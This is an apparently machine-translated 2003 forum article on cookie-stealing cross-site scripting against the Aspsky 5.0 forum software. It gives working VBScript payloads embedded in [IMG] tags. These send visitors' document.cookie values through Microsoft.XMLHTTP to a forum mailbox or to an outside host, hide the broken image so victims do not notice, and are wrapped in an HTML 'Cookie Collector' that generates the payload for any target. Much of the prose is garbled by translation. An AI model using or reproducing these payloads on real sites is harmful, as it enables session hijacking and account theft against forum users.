Author: Czy <czy82@elong.com>
Source: Http://www.nsfocus.net
Date: 2003-09-03
(Note that because the forum will deal with some words in the article Fu, it is best to
Http://www.chinansl.com/czy/xmlhttp.txt Read the article
Http://www.chinansl.com/czy/aspsky5.htm test Code)
Cross-site scripting attacks presumably everyone is already familiar with it, but when you get a cookie there's always a
Question: Always use window.open to bounce a form out and send cookies, so the stealth
It's a big discount. I used to think of a way to inject HTML statements into a Web page using the insertAdjacentHTML method.
The method can be made to send cookies do not appear in the IE window, but in actual use, sometimes encountered IE error.
Isn't there a better way? Previously, a microsoft.xmlhttp was used to study the automatic upgrade of the VBS virus.
Control (the control is the default on win98/2k, and it is the control that IE considers safe!), through which we
You can send an HTTP request to a Web site in a Web page, either post or get.
All right, the train of thought has come here, we can take the actual combat, I Aspsky 5.0 0320 for example.
We know that in SRC can be written to VBScript: such statements. Like what
This will be wrong!
What's the solution? In the VBS we can use the EXECUTE statement, in JS we can be used in the Eval language!
For example:
or
You're not dizzy, are you? Above you may notice that the EXECUTE statement with the VBS will be replaced with a double quote "This is because:
In the VBS enclose the string in single quotes, it must be two single quotes that represent one and the other quotes, and within double quotes!
So we can't use single quotes in the EXECUTE statement, and we can use "," when the HTML quotes match
Will match the src= "quotes, so we can only use" instead.
The problem with quotes is solved, and in practical applications Aspsky will also handle our code:
1: If a script string is found, precede it with a space
2: If you find that the HTTP string will be considered a URL, and add <A> elements on both sides
3: If you find a space will replace
Solve the problem:
1:vbscript with VBScript instead
2:http, "HT" "+" "TP ... Instead (in the VBS, the quotes inside quotation marks are more than a pair, + represents the connector)
3: Space with substitution (note not)
At the end of the question is the issue of sending cookies:
1: The control can get,post any Web site locally, but in the Web page it is only
Get,post Current server .... Otherwise, IE will say refuse imitation ask!
2:cookie can not have & etc in the URL has a special meaning of the characters
Solve the problem:
1: Only to the current server, then you can send cookies to your registered users on the forum mailbox:
2:replace (Document.cookie, "&" "," "-" "), in VBS
Replace replacement letter, in the example I replaced "&" with "-"
The problem is solved here are the actual examples:
Dynamic Network Aspsky 5.0 0320 Test Success
//----------------------
[Img]vbscript:execute ("Dat=replace" (Document.cookie, "&", ""-""): Set Http=createobject ("" Microsoft.XMLHTTP "" ): Http.open "" Get "", "" HT "" + "" Tp://www.hd315.gov.cn/gcs/19qu/yanqing/bbs/usersms.asp?action=send&touser=czy &title=news&submit= send &message= "" &dat,false:http.send ") [/IMG]
Note: Send cookies to Czy users, mail title called News
//----------------------
Normal use of another control:
<script language=vbs>
Dat=document.cookie
Set Http=createobject ("Microsoft.XMLHTTP")
Http.open "POST", "http://www.chinansl.com/czy/get.asp?cook=" &dat,false
Http.send
Tt=http.responsetext
MsgBox tt
</script>
Make the code more perfect, now cookies have obediently in our mailbox, but there is a small problem because the picture does not
The normal display will be a small fork, next to click on this in the new window to browse the picture tips ... It's going to make people
Dubious
Solution Idea:
All of the IMG elements in a Web page can be document.imanges by using an example, and can be set to their size, when width=0
The equivalent of hidden. By comparing the value of the SRC attribute of the element with the "Ript", it is possible to determine whether or not our picture. In addition,
Greater than > instead, 0 with 0 instead!
Code:
[Img]vbscript:execute ("For each AA in Document.images:if InStr (Aa.src," "Ript" ") >0 then:aa.width=0:end if:next") [/ IMG]
Actual code applied:
[Img]vbscript:execute ("For each AA in Document.images:if InStr (Aa.src," "Ript" ") >0 Then:aa.width=0:end Replace (Document.cookie, "&", ""-""): Set Http=createobject ("" Microsoft.XMLHTTP "): Http.open" "Get" "," "HT" "+" "Tp://www.hd315.gov.cn/gcs/19qu/yanqing/bbs/usersms.asp?action=send&touser=czy&title=alll&submit= Send &message= "" &dat,false:http.send ") [/IMG]
-------------------easy to use the rookie:)
<ptml> <script language=vbs> Sub Changeq () If form1.loc.value= "" or Form1.who.value= "" Then MsgBox "No Do you have an add address or username? " Exit Sub End If Loc=form1.loc.value user=form1.who.value str= "[Img]vbscript:execute (" For each AA in Document.image S:if InStr (AA.SRC, "Ript") >0 then:aa.width=0:end (If:next:dat=replace, "&", ""-""): Set HTTP =createobject ("" "Microsoft.XMLHTTP"): Http.open "" Get "", "" HT "" + "" tp://"&loc&"/usersms.asp?action=send &touser= "&user&" &title=news&submit= send &message= "&dat,false:http.send") [/IMG] " Form1.area.value=str End Sub </script> <body> <font size=5 Color=red>aspsky 5.0 0320 Cooki Collector- Czy <form name=form1> Settings send address: <input type=text name=loc send address like: Size=50>▲ (Www.nnit30.com/newbbs is web site The installation directory of the forum in the end do not add/, also do not http://headers) sent user name: <input type=text name=who size=20>-------------<input Type=button name=c hange value= generates code ONCLICK=CHANGEQ () > Generation generationCode:) <textarea name=area rows=10 cols=100></textarea> </form> </body> </ptml>
[Ctrl + A All SELECT Note: If the need to introduce external JS need to refresh to perform]
